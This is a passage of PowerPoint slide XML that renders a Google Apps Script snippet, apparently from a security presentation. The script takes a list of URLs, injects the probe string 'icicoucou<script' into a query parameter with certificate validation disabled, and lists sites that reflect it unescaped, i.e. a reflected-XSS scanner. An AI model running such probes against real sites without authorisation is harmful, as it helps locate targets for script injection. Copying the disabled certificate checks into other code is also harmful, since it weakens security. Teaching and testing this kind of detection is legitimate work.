                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>doGet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>() {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>HtmlService.createTemplateFromFile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('Page');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template.action</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = 'start';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>template.evaluate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>processUrls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>form</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>form.urls.split</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('\n');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>validUrls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = [];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>  for (var i = 0; i &lt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls.length</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>; i++) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    var url = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>urls</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>[i].trim();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    if (url === '') {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      continue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = url + '/?q=icicoucou%3Cscript';</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    var </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>try</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>UrlFetchApp.fetch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>scan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>, {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>muteHttpExceptions</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>validateHttpsCertificates</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>: false</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      });</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    } catch (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>error</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      continue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    if (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>response.getResponseCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>() !== 200) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      continue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    var content = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>response.getContentText</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    if (!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>content.includes</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>('</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>icicoucou</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>&lt;script')) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>      continue;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:br>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Roboto Mono" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>validUrls.push</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="500" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
